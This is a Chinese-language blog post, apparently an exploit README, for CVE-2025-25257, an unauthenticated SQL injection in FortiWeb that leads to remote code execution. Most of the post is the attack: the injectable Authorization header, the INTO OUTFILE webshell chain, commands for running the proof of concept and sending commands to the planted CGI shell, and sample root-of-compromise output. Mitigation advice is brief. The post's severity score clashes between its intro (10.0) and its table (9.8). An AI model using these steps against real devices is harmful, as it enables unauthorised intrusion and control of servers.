CVE-2025-25257漏洞利用:FortiWeb SQL注入到远程代码执行

本文详细介绍了CVE-2025-25257漏洞的利用方法,该漏洞影响FortiWeb系统的/api/fabric/device/status端点,允许攻击者通过未授权SQL注入写入webshell并实现远程命令执行,CVSS评分为10.0分。

🚨 CVE-2025-25257 – FortiWeb SQLi到RCE

严重SQL注入 → Webshell执行

由0xgh057r3c0n发现并武器化


🧠 漏洞概述

CVE-2025-25257影响暴露端点/api/fabric/device/status的FortiWeb系统,该系统未能正确清理Authorization头部输入。

攻击者可以执行未授权的SQL注入,在服务器上写入webshell并远程执行命令。


💥 攻击流程

1
SQL注入 ➜ SQL INTO OUTFILE ➜ Python chmod小工具 ➜ 触发 ➜ Webshell RCE

📍 受漏洞影响的端点

1
2
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 漏洞利用特性

  • 通过Bearer令牌进行SQL注入
  • 使用SQL INTO OUTFILE写入shell
  • Python钩子触发chmod
  • 通过User-Agent执行命令
  • 完全自动化的PoC

🧪 使用方法

1
python3 CVE-2025-25257.py -t https://目标主机.com

然后:

1
curl -k -H "User-Agent: whoami" https://目标主机.com/cgi-bin/x.cgi

🔧 要求

  • Python 3.6+
  • requests模块

安装:

1
pip install requests

📤 示例输出

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[*] 写入Webshell块: #!/bin/sh ...
[>] 导出Webshell到文件...
[*] 写入Chmod小工具块: import os ...
[>] 通过Python钩子触发chmod...
[*] 通过Webshell执行`id`...
uid=33(www-data) gid=33(www-data)

[+] Webshell准备就绪:
    > https://目标主机.com/cgi-bin/x.cgi
    > 通过User-Agent头部发送命令

📊 CVSS评估

指标
基础分数 9.8 (严重)
攻击向量 网络
所需权限
用户交互
影响 高 (机密性/完整性/可用性)

🛡️ 缓解措施

  • 更新FortiWeb固件(如果有补丁可用)
  • 清理所有头部输入
  • 限制文件写入路径和CGI执行

👨‍💻 作者

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ 免责声明

此概念验证仅用于教育和授权测试。 使用风险自负。作者不对滥用行为负责。


comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计